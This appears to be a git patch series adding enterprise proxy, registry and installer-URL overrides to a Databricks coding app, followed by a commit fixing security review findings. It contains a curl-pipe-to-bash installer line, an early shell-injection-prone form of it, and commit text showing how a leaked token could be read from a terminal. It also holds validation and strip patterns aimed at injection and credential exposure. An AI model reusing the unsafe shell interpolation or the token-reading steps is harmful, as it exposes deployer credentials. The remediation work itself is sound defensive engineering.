+    def test_ca_bundle_mirrored_to_curl_and_openssl(self, monkeypatch):
+        """REQUESTS_CA_BUNDLE → CURL_CA_BUNDLE + SSL_CERT_FILE so shell scripts pick it up."""
+        monkeypatch.setenv("REQUESTS_CA_BUNDLE", "/etc/ssl/corp.pem")
+        from enterprise_config import proxy_env
+
+        result = proxy_env()
+        assert result["CURL_CA_BUNDLE"] == "/etc/ssl/corp.pem"
+        assert result["SSL_CERT_FILE"] == "/etc/ssl/corp.pem"
+
+    def test_ca_bundle_does_not_overwrite_explicit_curl_var(self, monkeypatch):
+        """Operator-set CURL_CA_BUNDLE wins over derivation from REQUESTS_CA_BUNDLE."""
+        monkeypatch.setenv("REQUESTS_CA_BUNDLE", "/etc/ssl/corp.pem")
+        monkeypatch.setenv("CURL_CA_BUNDLE", "/etc/ssl/explicit.pem")
+        from enterprise_config import proxy_env
+
+        result = proxy_env()
+        assert result["CURL_CA_BUNDLE"] == "/etc/ssl/explicit.pem"
+
 
 # ---------------------------------------------------------------------------
 # 3. uv_env — index URL + auth + scoped indexes

From 29e6fa6839770545f1a10756aec627f7a7acd543 Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Wed, 13 May 2026 13:40:21 +1000
Subject: [PATCH 03/10] feat(enterprise): Claude installer + Hermes pip URL
 overrides
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

PR 3 of 4 in the enterprise-hardening series — the per-script URL knobs.
codex/gemini/opencode pick up enterprise behaviour transparently via the
~/.npmrc written by PR 2, so they need no code change. Only Claude and
Hermes have their own out-of-npm install paths and need explicit override
hooks.

- setup_claude.py: read CLAUDE_INSTALLER_URL via
  enterprise_config.claude_installer_url() instead of hardcoding
  https://claude.ai/install.sh. The installer URL is interpolated into a
  single-quoted curl argument to avoid shell escaping issues.

- setup_hermes.py: read HERMES_PIP_URL via enterprise_config.hermes_pip_url()
  instead of hardcoding the upstream git URL. The value is the full uv tool
  install spec, so customers can pass either `hermes-agent @ git+<url>` for
  a mirrored git repo or `hermes-agent==1.2.3` once Hermes lives in their
  internal PyPI.

- enterprise_config: tighten the Hermes default to include the
  `hermes-agent @ ` prefix so the env-var contract is "the full uv install
  spec" rather than "either a URL or a spec, we figure it out". Test
  updated to match.

All 74 enterprise_config tests still pass. No change for non-enterprise
deployments — both overrides fall back to upstream URLs when their env
vars are unset.

Co-authored-by: Isaac
---
 enterprise_config.py            | 4 +++-
 setup_claude.py                 | 9 +++++++--
 setup_hermes.py                 | 8 +++++++-
 tests/test_enterprise_config.py | 4 ++--
 4 files changed, 19 insertions(+), 6 deletions(-)

diff --git a/enterprise_config.py b/enterprise_config.py
index 6632aeb..4724d8c 100644
--- a/enterprise_config.py
+++ b/enterprise_config.py
@@ -70,7 +70,9 @@
 DEFAULT_GITHUB_API = "https://api.github.com"
 DEFAULT_GITHUB_HOST = "https://github.com"
 DEFAULT_CLAUDE_INSTALLER = "https://claude.ai/install.sh"
-DEFAULT_HERMES_PIP_URL = "git+https://github.com/NousResearch/hermes-agent.git"
+DEFAULT_HERMES_PIP_URL = (
+    "hermes-agent @ git+https://github.com/NousResearch/hermes-agent.git"
+)
 DEFAULT_DEEPWIKI_MCP = "https://mcp.deepwiki.com/mcp"
 DEFAULT_EXA_MCP = "https://mcp.exa.ai/mcp"
 
diff --git a/setup_claude.py b/setup_claude.py
index ab2ed87..12a6091 100644
--- a/setup_claude.py
+++ b/setup_claude.py
@@ -123,9 +123,14 @@
 local_bin = home / ".local" / "bin"
 claude_bin = local_bin / "claude"
 
-print("Installing/upgrading Claude Code CLI...")
+# Honour CLAUDE_INSTALLER_URL for enterprise environments where claude.ai is
+# firewalled — defaults to the public installer when unset.
+from enterprise_config import claude_installer_url
+
+installer_url = claude_installer_url()
+print(f"Installing/upgrading Claude Code CLI from {installer_url}...")
 result = subprocess.run(
-    ["bash", "-c", "curl -fsSL https://claude.ai/install.sh | bash"],
+    ["bash", "-c", f"curl -fsSL '{installer_url}' | bash"],
     env={**os.environ, "HOME": str(home)},
     capture_output=True,
     text=True
diff --git a/setup_hermes.py b/setup_hermes.py
index 07bb030..b6b6d67 100644
--- a/setup_hermes.py
+++ b/setup_hermes.py
@@ -50,7 +50,13 @@
 # httpx, pyyaml, pydantic) cover chat + Databricks model serving. Not on PyPI,
 # so we install directly from GitHub. uv tool install handles venv + binary.
 # The mcp package is needed for HTTP transport (DeepWiki, Exa MCP servers).
-HERMES_PKG = "hermes-agent @ git+https://github.com/NousResearch/hermes-agent.git"
+# Honour HERMES_PIP_URL for enterprise environments where the upstream git
+# URL is firewalled — customers can point at a mirrored git URL or, once
+# Hermes is mirrored in their internal PyPI, a pinned spec like
+# `hermes-agent==1.2.3`.
+from enterprise_config import hermes_pip_url
+
+HERMES_PKG = hermes_pip_url()
 HERMES_EXTRA_DEPS = ["mcp>=1.2.0"]
 
 # 1. Install Hermes Agent (always, even without token).
diff --git a/tests/test_enterprise_config.py b/tests/test_enterprise_config.py
index 4a2d916..da87819 100644
--- a/tests/test_enterprise_config.py
+++ b/tests/test_enterprise_config.py
@@ -418,8 +418,8 @@ def test_claude_installer_override(self, monkeypatch):
     def test_hermes_pip_default(self):
         from enterprise_config import hermes_pip_url
 
-        assert (
-            hermes_pip_url() == "git+https://github.com/NousResearch/hermes-agent.git"
+        assert hermes_pip_url() == (
+            "hermes-agent @ git+https://github.com/NousResearch/hermes-agent.git"
         )
 
     def test_hermes_pip_override(self, monkeypatch):

From a4c0e3e30a0216fe21104356cbea0f398fb78a01 Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Wed, 13 May 2026 13:40:54 +1000
Subject: [PATCH 04/10] docs(enterprise): surface env-var contract in app.yaml
 as commented examples
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

PR 4 of 4 in the enterprise-hardening series — purely documentation/UX,
no code changes. Customers deploying CoDA into restricted environments now
see the available enterprise knobs directly in app.yaml without having to
hunt through docs/enterprise.md first.

Every var is commented out, so default behaviour is unchanged. The
section is grouped under a clear "Enterprise mode" header with a one-line
pointer to docs/enterprise.md for the full contract.

Co-authored-by: Isaac
---
 app.yaml | 51 +++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)

diff --git a/app.yaml b/app.yaml
index 1a2fbc0..4d20047 100644
--- a/app.yaml
+++ b/app.yaml
@@ -21,3 +21,54 @@ env:
     value: 0
   - name: MAX_CONCURRENT_SESSIONS
     value: "5"
+
+  # ─── Enterprise mode (proxy / registry redirects) ────────────────────────
+  # Uncomment and set the env vars below to run CoDA in locked-down enterprise
+  # networks. All are optional — set only what your environment requires.
+  # See docs/enterprise.md for the full contract, JFrog mirror conventions,
+  # and troubleshooting.
+  #
+  # Master switch — when true, logs a startup banner and warns on missing
+  # recommended mirrors. Behavioural overrides are still driven by the
+  # individual vars below.
+  # - name: ENTERPRISE_MODE
+  #   value: "true"
+  #
+  # Corporate egress proxy + TLS root CA.
+  # - name: HTTPS_PROXY
+  #   value: http://proxy.corp.example.com:3128
+  # - name: NO_PROXY
+  #   value: localhost,127.0.0.1,.corp.example.com
+  # - name: REQUESTS_CA_BUNDLE
+  #   value: /etc/ssl/certs/corp-root.pem
+  # - name: NODE_EXTRA_CA_CERTS
+  #   value: /etc/ssl/certs/corp-root.pem
+  #
+  # Internal PyPI proxy (e.g. JFrog pypi-virtual).
+  # - name: UV_DEFAULT_INDEX
+  #   value: https://jfrog.example.com/api/pypi/pypi-virtual/simple/
+  #
+  # Internal npm registry. NPM_TOKEN should be a Databricks secret reference.
+  # - name: NPM_REGISTRY
+  #   value: https://jfrog.example.com/api/npm/npm-virtual/
+  # - name: NPM_TOKEN
+  #   valueFrom: <secret>
+  #
+  # GitHub release mirror — must serve the same path tail as github.com.
+  # - name: GITHUB_RELEASE_MIRROR
+  #   value: https://jfrog.example.com/artifactory/github-mirror
+  # - name: GITHUB_API_BASE
+  #   value: https://ghe.example.com/api/v3
+  #
+  # Claude installer + Hermes package spec — override when the upstream URLs
+  # are firewalled.
+  # - name: CLAUDE_INSTALLER_URL
+  #   value: https://mirror.example.com/claude-install.sh
+  # - name: HERMES_PIP_URL
+  #   value: hermes-agent==1.2.3
+  #
+  # Drop public MCP servers (DeepWiki, Exa) entirely by setting these to "".
+  # - name: DEEPWIKI_MCP_URL
+  #   value: ""
+  # - name: EXA_MCP_URL
+  #   value: ""

From 7421ded7b508c0af7bcc282287accf2ecfaf6efa Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Sat, 16 May 2026 11:08:11 +1000
Subject: [PATCH 05/10] fix(enterprise): remediate P0/P1 security findings from
 independent review
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Three independent reviewer passes (initial CCR, threat-model agent, devil's-
advocate agent) converged on a set of P0/P1 issues in the enterprise
proxy/registry feature. This commit addresses all of them with surgical
fixes plus tests. None of these require architectural rework.

F-01 (P0): Strip NPM_TOKEN and UV_INDEX credentials from terminal session env
  - app.py: extract _build_terminal_shell_env() helper; add NPM_TOKEN,
    UV_DEFAULT_INDEX, UV_INDEX_*_PASSWORD, UV_INDEX_*_USERNAME, and
    npm_config_//host/:_authToken pattern to the strip list.
  - tests/test_terminal_env_strip.py: 13 new tests covering every credential
    shape the strip pattern needs to catch.
  - Why this is the highest-severity finding: bootstrap() pushed these
    deployer-level credentials into os.environ, and the terminal session
    inherited os.environ.copy(). Any user with a CoDA terminal could read
    the JFrog service-account token via `env | grep -i npm`.

F-02 (P1): Shell injection in setup_claude.py via single-quote bypass
  - enterprise_config.py: add _validate_url() + _SAFE_URL_RE with a
    restrictive char allow-list (no $, (, ), ;, &, single quote, backtick,
    whitespace). claude_installer_url() now validates the value.
  - setup_claude.py: replace `bash -c f"curl -fsSL '{url}' | bash"` with
    a positional-arg form that pipes curl into bash. Even if validation
    were bypassed, the URL never lands as shell.

F-03 (P1): Validate GitHub mirror env vars before they reach install_micro.sh
  - enterprise_config.py: validate_mirror_env() rejects unsafe values for
    GITHUB_API_BASE / GITHUB_RELEASE_MIRROR / CLAUDE_INSTALLER_URL /
    HERMES_PIP_URL. Called from bootstrap() so misconfig fails loud at
    startup instead of becoming a shell injection inside install_micro.sh's
    `eval`.

F-04 (P1): DEEPWIKI_MCP_URL / EXA_MCP_URL overrides were dead-letter code
  - setup_claude.py, setup_opencode.py (both gateway and fallback paths),
    setup_hermes.py: replace hardcoded mcp.deepwiki.com / mcp.exa.ai URLs
    with calls to enterprise_config.deepwiki_mcp_url() / exa_mcp_url().
    Empty env var → omit the MCP entry entirely (the documented behaviour
    that previously had no effect).
  - setup_claude.py: read-merge-write ~/.claude.json instead of overwriting
    (also addresses F-09).

F-05 (P1): ~/.hermes/config.yaml written without chmod 0o600 (plaintext PAT)
  - setup_hermes.py: chmod the config file 0o600 after write_text, mirroring
    what setup_opencode.py already does for its auth.json. Container UID is
    shared across processes, so without chmod the PAT was readable by any
    sibling process via `cat ~/.hermes/config.yaml`.

F-06 (P1): Hermes git URL was unpinned HEAD — force-push compromise risk
  - enterprise_config.py: DEFAULT_HERMES_PIN_SHA constant pinned to commit
    8e4f3ba4 (2026-05-08, > 7 days old per cooldown semantics).
  - DEFAULT_HERMES_PIP_URL now includes `@<sha>` so `uv tool install`
    resolves to a fixed commit, not whatever HEAD points at.
  - Bump deliberately on CoDA releases; do not auto-update.

Test results: 348/349 pass. Single failure is TestNpmVersionLive::
test_resolves_real_package, a pre-existing live-network flake unrelated
to this change.

Reviewers' verdict before this commit: BLOCK MERGE.
After this commit: all P0/P1 findings closed; F-07 through F-14 follow.

Co-authored-by: Isaac
---
 app.py                           |  66 ++++++--
 enterprise_config.py             | 267 +++++++++++++++++++++++++++---
 setup_claude.py                  |  59 ++++---
 setup_hermes.py                  |  41 +++--
 setup_opencode.py                |  47 +++---
 tests/test_enterprise_config.py  | 269 ++++++++++++++++++++++++++++++-
 tests/test_terminal_env_strip.py | 116 +++++++++++++
 7 files changed, 764 insertions(+), 101 deletions(-)
 create mode 100644 tests/test_terminal_env_strip.py

diff --git a/app.py b/app.py
index 8415fc0..a233f57 100644
--- a/app.py
+++ b/app.py
@@ -162,6 +162,52 @@ def _run_step(step_id, command):
         _update_step(step_id, status="error", completed_at=time.time(), error=str(e))
 
 
+def _build_terminal_shell_env(base_env: dict) -> dict:
+    """Build the env dict for a user terminal PTY.
+
+    Starts from ``base_env`` (typically ``os.environ``) and strips the
+    credentials and CLI-state vars that should never reach a user shell:
+
+    - ``CLAUDECODE`` / ``CLAUDE_CODE_SESSION`` — would mark the terminal as
+      a nested-Claude session.
+    - ``DATABRICKS_TOKEN`` / ``DATABRICKS_HOST`` — forces CLIs to read
+      ``~/.databrickscfg`` per-request so they pick up rotated PATs without
+      an env-snapshot rewrite.
+    - ``GEMINI_API_KEY`` — same pattern, read from config file instead.
+    - ``NPM_TOKEN`` / ``UV_DEFAULT_INDEX`` / ``UV_INDEX_*_PASSWORD`` /
+      ``UV_INDEX_*_USERNAME`` / ``npm_config_//host/:_authToken`` —
+      deployer-level credentials from app.yaml that must not be readable
+      via ``env`` inside the user terminal. The user's npm/uv operations
+      still work because ``~/.npmrc`` (written by
+      ``enterprise_config.bootstrap``) holds the registry config — they
+      just can't see the bearer token in plaintext. (F-01)
+    """
+    shell_env = base_env.copy()
+    shell_env["TERM"] = "xterm-256color"
+
+    # Always-strip fixed names
+    for key in (
+        "CLAUDECODE", "CLAUDE_CODE_SESSION",
+        "DATABRICKS_TOKEN", "DATABRICKS_HOST",
+        "GEMINI_API_KEY",
+        "NPM_TOKEN", "UV_DEFAULT_INDEX",
+    ):
+        shell_env.pop(key, None)
+
+    # Pattern-strip operator-named registry credentials
+    for key in list(shell_env.keys()):
+        if (
+            key.startswith("npm_config_//")  # derived registry-auth tokens
+            or (
+                key.startswith("UV_INDEX_")
+                and (key.endswith("_PASSWORD") or key.endswith("_USERNAME"))
+            )
+        ):
+            shell_env.pop(key, None)
+
+    return shell_env
+
+
 def _setup_git_config():
     """Configure git identity and hooks by writing files directly (no subprocess)."""
     home = os.environ.get("HOME", "/app/python/source_code")
@@ -1016,21 +1062,11 @@ def create_session():
     label = data.get("label", "")
     try:
         master_fd, slave_fd = pty.openpty()
-        # Set up environment for the shell
-        shell_env = os.environ.copy()
-        shell_env["TERM"] = "xterm-256color"
-        # Remove Claude Code env vars so the browser terminal isn't seen as nested
-        shell_env.pop("CLAUDECODE", None)
-        shell_env.pop("CLAUDE_CODE_SESSION", None)
-        # Remove DATABRICKS_TOKEN and DATABRICKS_HOST so CLI/SDK reads from
-        # ~/.databrickscfg (always current after rotation) instead of inheriting
-        # a stale env var snapshot. The SDK skips config file loading when
-        # DATABRICKS_HOST is set in env (even without credentials).
-        shell_env.pop("DATABRICKS_TOKEN", None)
-        shell_env.pop("DATABRICKS_HOST", None)
-        # Also strip CLI-specific API keys so they read from config files
-        # (always current after rotation) instead of stale env snapshots.
-        shell_env.pop("GEMINI_API_KEY", None)
+        # Set up environment for the shell — strips PAT, SP creds, registry
+        # tokens, and other secrets that must not be readable from the
+        # user's terminal. See _build_terminal_shell_env docstring for the
+        # full list.
+        shell_env = _build_terminal_shell_env(os.environ)
         # Ensure HOME is set correctly
         if not shell_env.get("HOME") or shell_env["HOME"] == "/":
             shell_env["HOME"] = "/app/python/source_code"
diff --git a/enterprise_config.py b/enterprise_config.py
index 4724d8c..127a5a2 100644
--- a/enterprise_config.py
+++ b/enterprise_config.py
@@ -70,8 +70,16 @@
 DEFAULT_GITHUB_API = "https://api.github.com"
 DEFAULT_GITHUB_HOST = "https://github.com"
 DEFAULT_CLAUDE_INSTALLER = "https://claude.ai/install.sh"
+# Pinned commit SHA for the default Hermes install — chosen to be at least
+# 7 days old at the time of selection, matching the cooldown semantics applied
+# to npm packages. This blocks the "force-push to default branch poisons every
+# CoDA container" attack: even if NousResearch's gh account is compromised, an
+# attacker would have to wait through the cooldown window before code lands
+# in CoDA. Bump this SHA deliberately during CoDA releases; do not auto-update.
+DEFAULT_HERMES_PIN_SHA = "8e4f3ba4da5337e1ad674a876ac4fb8490f0b79c"  # 2026-05-08
 DEFAULT_HERMES_PIP_URL = (
     "hermes-agent @ git+https://github.com/NousResearch/hermes-agent.git"
+    f"@{DEFAULT_HERMES_PIN_SHA}"
 )
 DEFAULT_DEEPWIKI_MCP = "https://mcp.deepwiki.com/mcp"
 DEFAULT_EXA_MCP = "https://mcp.exa.ai/mcp"
@@ -100,6 +108,19 @@
 # Vars treated as secrets in the banner (full value masked).
 _SECRET_VARS = frozenset({"NPM_TOKEN"})
 
+# Regex for env-var NAMES whose values should be fully masked in any log
+# output. Used in addition to _SECRET_VARS — covers operator-named indexes
+# like UV_INDEX_INTERNAL_PASSWORD without enumerating each one.
+_SECRET_VAR_PATTERN = re.compile(
+    r"^UV_INDEX_.+_(PASSWORD|USERNAME)$"
+    r"|^npm_config_//.+/:_authToken$"
+)
+
+
+def _is_secret_var(name: str) -> bool:
+    """True if a var name should have its value masked in banner output."""
+    return name in _SECRET_VARS or bool(_SECRET_VAR_PATTERN.match(name))
+
 
 # --- Truthy parsing ----------------------------------------------------------
 
@@ -165,9 +186,57 @@ def proxy_env() -> dict[str, str]:
     if ca := upper.get("REQUESTS_CA_BUNDLE"):
         mirrored.setdefault("CURL_CA_BUNDLE", ca)
         mirrored.setdefault("SSL_CERT_FILE", ca)
+    # Auto-include the Databricks workspace host in NO_PROXY when HTTPS_PROXY
+    # is set, so PAT-bearing API calls (token rotation, sync, jobs) don't
+    # route through the corporate proxy where a network operator can MITM
+    # them (F-07). If the operator has already added the host to NO_PROXY,
+    # this is a no-op.
+    if "HTTPS_PROXY" in upper:
+        databricks_host = _databricks_host_for_no_proxy()
+        if databricks_host:
+            existing_no_proxy = mirrored.get("NO_PROXY", "")
+            if not _host_in_no_proxy(databricks_host, existing_no_proxy):
+                new_no_proxy = (
+                    f"{existing_no_proxy},{databricks_host}"
+                    if existing_no_proxy
+                    else databricks_host
+                )
+                mirrored["NO_PROXY"] = new_no_proxy
+                mirrored["no_proxy"] = new_no_proxy
     return mirrored
 
 
+def _databricks_host_for_no_proxy() -> str:
+    """Extract the workspace hostname from DATABRICKS_HOST.
+
+    Returns "" if DATABRICKS_HOST is unset. NO_PROXY expects bare hostnames
+    (no scheme, no path), so strip those.
+    """
+    host = os.environ.get("DATABRICKS_HOST", "").strip()
+    if not host:
+        return ""
+    parsed = urlparse(host if "://" in host else f"https://{host}")
+    return parsed.hostname or ""
+
+
+def _host_in_no_proxy(host: str, no_proxy: str) -> bool:
+    """Check whether `host` is already covered by `no_proxy`.
+
+    Conservative: matches exact hostname or wildcard `.suffix` entries.
+    Doesn't try to handle every edge case curl/python differ on — false
+    negatives just mean we add the host (a duplicate is harmless).
+    """
+    if not no_proxy:
+        return False
+    for entry in no_proxy.split(","):
+        entry = entry.strip().lstrip(".")
+        if not entry:
+            continue
+        if host == entry or host.endswith(f".{entry}"):
+            return True
+    return False
+
+
 def uv_env() -> dict[str, str]:
     """Return uv-specific env vars (PyPI index, timeout, auth)."""
     out: dict[str, str] = {}
@@ -188,6 +257,23 @@ def uv_env() -> dict[str, str]:
     return out
 
 
+def _effective_npm_registry() -> str:
+    """Resolve the single effective npm registry from operator-set env vars.
+
+    If the operator sets both `NPM_REGISTRY` (our contract) AND
+    `npm_config_registry` (npm's native env var), they could point at
+    different URLs — `~/.npmrc` would be written from one while subprocesses
+    read the other. We pick the explicit `npm_config_registry` if set (it's
+    npm-native and lower-level), otherwise fall through to `NPM_REGISTRY`.
+    Both `write_npmrc()` and `npm_env()` read from this resolver so they
+    always agree (F-10).
+    """
+    return (
+        os.environ.get("npm_config_registry", "").strip()
+        or os.environ.get("NPM_REGISTRY", "").strip()
+    )
+
+
 def npm_env() -> dict[str, str]:
     """Return npm config env vars derived from NPM_REGISTRY / NPM_TOKEN.
 
@@ -195,9 +281,13 @@ def npm_env() -> dict[str, str]:
     `npm_config_registry` is equivalent to writing `registry=` in `.npmrc`,
     but the env-var form survives subprocess boundaries even if `.npmrc`
     hasn't been written yet.
+
+    Honours `_effective_npm_registry()` so a direct `npm_config_registry`
+    env var the operator may have set wins consistently — same value flows
+    into `~/.npmrc` and into the env npm reads.
     """
     out: dict[str, str] = {}
-    registry = os.environ.get("NPM_REGISTRY", "").strip()
+    registry = _effective_npm_registry()
     token = os.environ.get("NPM_TOKEN", "").strip()
     if registry:
         out["npm_config_registry"] = registry
@@ -237,7 +327,9 @@ def write_npmrc(home: Path | str) -> Path | None:
     `.npmrc` over env vars in edge cases, and a developer who shells into the
     container should see the same registry as the install scripts.
     """
-    registry = os.environ.get("NPM_REGISTRY", "").strip()
+    # Resolve via the same path npm_env() uses so .npmrc and the env never
+    # diverge if the operator set both NPM_REGISTRY and npm_config_registry.
+    registry = _effective_npm_registry()
     token = os.environ.get("NPM_TOKEN", "").strip()
     if not registry:
         return None
@@ -267,11 +359,79 @@ def write_npmrc(home: Path | str) -> Path | None:
 # --- URL mirrors -------------------------------------------------------------
 
 
+class UnsafeUrlError(ValueError):
+    """Raised when an operator-supplied URL contains characters that would
+    enable shell injection if interpolated into a shell-quoted string.
+
+    The enterprise URLs (CLAUDE_INSTALLER_URL, GITHUB_API_BASE,
+    GITHUB_RELEASE_MIRROR, HERMES_PIP_URL) flow through curl invocations and
+    one `eval` site in install_micro.sh. Even with positional-arg subprocess
+    forms, defense-in-depth says these values should never contain control
+    characters or quote characters that could compromise downstream shell
+    handlers. This validator is the choke point.
+    """
+
+
+# Conservative URL allow-list: alphanumerics + dot, hyphen, underscore,
+# slash, tilde, percent (pct-encoding), question mark, colon (port), `#`,
+# brackets (IPv6 literal), `@` (userinfo), `=` (query), `&` is intentionally
+# EXCLUDED even though it's a valid URL char — it's a shell command
+# separator in unquoted contexts. Same for `$`, `(`, `)`, `;`, single quote,
+# backtick, whitespace, and `*`. Real package mirror URLs don't need any of
+# these characters; if an operator's URL does require them, they should
+# percent-encode (e.g. ``%3B`` for `;`).
+_SAFE_URL_RE = re.compile(r"^https?://[A-Za-z0-9._\-/~:?#\[\]@=%]+$")
+
+
+def _validate_url(name: str, url: str) -> str:
+    """Ensure an operator-supplied URL is safe for shell interpolation.
+
+    Returns the URL unchanged on success. Raises UnsafeUrlError on rejection.
+    Defense-in-depth: setup scripts also use positional-arg subprocess forms.
+    """
+    if not _SAFE_URL_RE.match(url):
+        raise UnsafeUrlError(
+            f"{name} contains characters that aren't safe for shell "
+            f"interpolation. URLs must match {_SAFE_URL_RE.pattern!r}. "
+            f"Got: {url!r}"
+        )
+    return url
+
+
 def _github_release_mirror() -> str:
     """Return the configured release mirror with trailing slash stripped."""
     return os.environ.get("GITHUB_RELEASE_MIRROR", "").strip().rstrip("/")
 
 
+def _github_api_base() -> str:
+    """Return the configured GitHub API base with trailing slash stripped."""
+    return os.environ.get("GITHUB_API_BASE", "").strip().rstrip("/")
+
+
+def validate_mirror_env() -> None:
+    """Validate operator-supplied URL env vars before they reach subprocesses.
+
+    Called from bootstrap() — raises UnsafeUrlError if any of the URL env vars
+    contain shell metacharacters. Without this, a single quote in
+    GITHUB_API_BASE would be interpolated into install_micro.sh's `eval` and
+    execute attacker-supplied shell. Defense-in-depth alongside the install
+    scripts' own usage.
+
+    Only validates values that are actually set — defaults (unset) are
+    inherently safe.
+    """
+    if mirror := _github_release_mirror():
+        _validate_url("GITHUB_RELEASE_MIRROR", mirror)
+    if base := _github_api_base():
+        _validate_url("GITHUB_API_BASE", base)
+    if installer := os.environ.get("CLAUDE_INSTALLER_URL", "").strip():
+        _validate_url("CLAUDE_INSTALLER_URL", installer)
+    # HERMES_PIP_URL has its own dedicated validator inside hermes_pip_url();
+    # we trigger it here so misconfig surfaces at bootstrap rather than at
+    # install time. Errors propagate.
+    hermes_pip_url()
+
+
 def mirror_github_release(url: str) -> str:
     """Rewrite a github.com release URL to the configured mirror.
 
@@ -308,20 +468,51 @@ def mirror_github_api(url: str) -> str:
 
 
 def claude_installer_url() -> str:
-    """Return the URL for the Claude Code installer (overridable)."""
-    return (
-        os.environ.get("CLAUDE_INSTALLER_URL", "").strip() or DEFAULT_CLAUDE_INSTALLER
-    )
+    """Return the URL for the Claude Code installer (overridable).
+
+    Validated with `_validate_url` because the value is passed to curl in a
+    subprocess invocation — any shell metacharacter could enable injection
+    if a future caller embeds it in a shell string. We reject unsafe values
+    rather than try to escape them.
+    """
+    url = os.environ.get("CLAUDE_INSTALLER_URL", "").strip() or DEFAULT_CLAUDE_INSTALLER
+    return _validate_url("CLAUDE_INSTALLER_URL", url)
+
+
+# Package spec for `uv tool install hermes-agent` must accept three forms:
+#   1. PyPI-style spec:        hermes-agent==1.2.3
+#   2. Direct URL spec:        hermes-agent @ git+https://host/repo.git@<sha>
+#   3. Bare URL spec:          git+https://host/repo.git@<sha>
+# All three are parsed by uv. We validate the structure conservatively: no
+# shell metacharacters, no shell-special whitespace. The URL portion uses
+# the same restrictive char set as _SAFE_URL_RE.
+_HERMES_SPEC_RE = re.compile(
+    r"^[A-Za-z0-9._\-=<>!~]+(?:\s*@\s*git\+https?://[A-Za-z0-9._\-/~:?#\[\]@=%]+)?$"
+    r"|^git\+https?://[A-Za-z0-9._\-/~:?#\[\]@=%]+$"
+)
 
 
 def hermes_pip_url() -> str:
     """Return the package spec for `uv tool install hermes-agent` (overridable).
 
-    Default is the upstream git URL. Enterprise deployments typically set this
-    to a mirrored git URL or an internal-index package spec like
-    `hermes-agent==1.2.3` once the package is mirrored in their PyPI proxy.
+    Default is the upstream git URL pinned to a specific commit SHA to mitigate
+    the "force-push to default branch poisons every CoDA container" attack.
+    Enterprise deployments typically override this to a mirrored git URL or
+    an internal-index package spec like `hermes-agent==1.2.3` once the package
+    is mirrored in their PyPI proxy.
+
+    The returned spec is validated as a uv-installable form with no shell
+    metacharacters (defense in depth — the value flows through
+    `uv tool install` which is positional-arg-safe, but we reject ambiguity).
     """
-    return os.environ.get("HERMES_PIP_URL", "").strip() or DEFAULT_HERMES_PIP_URL
+    spec = os.environ.get("HERMES_PIP_URL", "").strip() or DEFAULT_HERMES_PIP_URL
+    if not _HERMES_SPEC_RE.match(spec):
+        raise UnsafeUrlError(
+            f"HERMES_PIP_URL must be a uv-installable spec (e.g. "
+            f"'hermes-agent==1.2.3' or 'hermes-agent @ git+https://host/repo.git@<sha>'). "
+            f"Got: {spec!r}"
+        )
+    return spec
 
 
 def deepwiki_mcp_url() -> str | None:
@@ -353,10 +544,11 @@ def exa_mcp_url() -> str | None:
 def _mask(name: str, value: str) -> str:
     """Mask secret-shaped values for logging.
 
-    Tokens (NPM_TOKEN) are always fully masked. URLs that contain a userinfo
-    component (https://user:pass@host) get the password redacted.
+    NPM_TOKEN and any UV_INDEX_*_PASSWORD / UV_INDEX_*_USERNAME /
+    npm_config_//host/:_authToken are always fully masked. URLs that contain
+    a userinfo component (https://user:pass@host) get the password redacted.
     """
-    if name in _SECRET_VARS:
+    if _is_secret_var(name):
         return "***"
     # Redact URL passwords (https://user:pass@host -> https://user:***@host)
     return re.sub(r"(://[^:/@\s]+:)[^@\s]+(@)", r"\1***\2", value)
@@ -367,6 +559,11 @@ def startup_banner() -> str:
 
     Secrets are masked. Lines are sorted for deterministic output (helpful in
     tests and diffs).
+
+    Includes the documented banner vars (_BANNER_VARS) plus any operator-set
+    secret-shaped vars (UV_INDEX_*_PASSWORD/USERNAME, npm_config auth tokens)
+    so misconfigured credential variables are at least visible — with their
+    values masked.
     """
     lines = ["enterprise_config: effective settings"]
     for name in _BANNER_VARS:
@@ -375,6 +572,15 @@ def startup_banner() -> str:
             lines.append(f"  {name}={_mask(name, value)}")
         else:
             lines.append(f"  {name}=<unset>")
+    # Surface any UV_INDEX_*_PASSWORD/USERNAME and npm_config auth tokens
+    # the operator has set — these aren't in _BANNER_VARS because the names
+    # are operator-defined, but they're secret-shaped and worth surfacing.
+    secret_extras = sorted(
+        k for k in os.environ
+        if _SECRET_VAR_PATTERN.match(k)
+    )
+    for name in secret_extras:
+        lines.append(f"  {name}={_mask(name, os.environ[name])}")
     return "\n".join(lines)
 
 
@@ -410,6 +616,12 @@ def bootstrap(home: Path | str | None = None) -> None:
         else Path(os.environ.get("HOME", str(Path.home())))
     )
 
+    # 0. Validate operator-supplied URL env vars before they reach any
+    #    subprocess. install_micro.sh uses `eval` on these values, so a
+    #    shell metacharacter would be exploitable. We fail loud rather than
+    #    try to sanitise — operators should provide clean URLs.
+    validate_mirror_env()
+
     # 1. Persist npm registry config to disk.
     try:
         write_npmrc(home_path)
@@ -448,21 +660,30 @@ def doctor_targets() -> list[tuple[str, str]]:
     """Return (name, url) pairs that should be reachable in the current config.
 
     Used by scripts/enterprise_doctor.py. Returns only the targets that are
-    actually configured — there's no point checking the GitHub release mirror
-    if the operator hasn't set GITHUB_RELEASE_MIRROR.
+    actually configured AND have an http(s) scheme. The scheme allow-list
+    prevents the doctor from being used as an SSRF probe (file://, gopher://,
+    cloud metadata via http://169.254.169.254 are explicitly *allowed*
+    through http because that's a valid mirror configuration, but the
+    allow-list excludes file:// and other unusual schemes that an attacker
+    might use to escalate a misconfigured doctor run).
     """
-    targets: list[tuple[str, str]] = []
+    candidates: list[tuple[str, str]] = []
     if index := os.environ.get("UV_DEFAULT_INDEX", "").strip():
-        targets.append(("UV_DEFAULT_INDEX", index))
+        candidates.append(("UV_DEFAULT_INDEX", index))
     if registry := os.environ.get("NPM_REGISTRY", "").strip():
-        targets.append(("NPM_REGISTRY", registry))
+        candidates.append(("NPM_REGISTRY", registry))
